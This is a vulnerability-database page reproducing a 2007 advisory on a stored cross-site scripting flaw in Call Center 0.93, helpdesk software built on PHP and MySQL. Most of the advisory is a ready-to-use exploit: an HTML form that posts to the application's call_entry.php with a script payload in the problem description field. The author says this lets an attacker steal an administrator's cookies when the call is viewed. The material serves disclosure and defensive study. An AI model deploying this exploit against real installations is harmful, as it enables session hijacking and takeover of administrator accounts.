Vulners
Lucene search
ccs-xss.txt
`-=[--------------------ADVISORY-------------------]=-
Call center 0,93
Author: CorryL [[email protected]]
-=[-----------------------------------------------]=-
-=[+] Application: Call senter
-=[+] Version: 0,93
-=[+] Vendor's URL: http://www.call-center-software.org/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Cross-Site Script
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.xoned.net
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck
..::[ Descriprion ]::..
Call center software is one of the most important aspects of any call help center,
being able to track and manage calls can be the key to high customer safisfacation.
Our 100% free call center software solution is based on php and the mysql database.
..::[ Bug ]::..
An attacker exploiting this vulnerability is able steal the content
the cookies of the consumer admin in fact the bug situated is on an request post
then he remains memorized inside the database in attends him that the admin
goes to read the content of the call
..::[Exploit]::..
<html>
<head>
<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="helpdesk.css" type="text/css">
</head>
<body>
<table bgcolor="#FFFFFF" width="100%">
<tr>
<td align="center">
<form method="post" action="http://remote_server/path/call_entry.php">
<table border="0">
<tr>
<th class="ttitle">Adding Call</th>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="3">
<tr>
<td align="right">Name: </td><td align="left"><input type="text" name="name" Value="H4ck3r"size="30"></td>
</tr>
<tr>
<td align="right">Phone: </td><td align="left"><input type="text" name="phone" value="111-555-555" size="20"></td>
</tr>
<tr>
<td align="right">Department: </td>
<td>
<select name="department_id">
<option value="1">Problem</option>
</select>
</td>
</tr>
<tr>
<td align="right">Issue Type: </td>
<td>
<select name="issue_id">
<option value="6">email</option>
<option value="2">keyboard</option>
<option value="3">monitor</option>
<option value="5">mouse</option>
<option value="4">network</option>
<option value="8">password</option>
<option value="7">word processing</option>
</select>
</td>
</tr>
<tr>
<td align="right" valign="top">Xss Script Here : </td>
<td align="left"><input type="text" name="problem_desc" value="<body onload=alert(1395499912)>" size="50"></td>
</tr>
<tr>
<td> </td><td><input type="submit" name="submit" value="Add" class="button"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2007 00:00Current
7.4High risk
Vulners AI Score7.4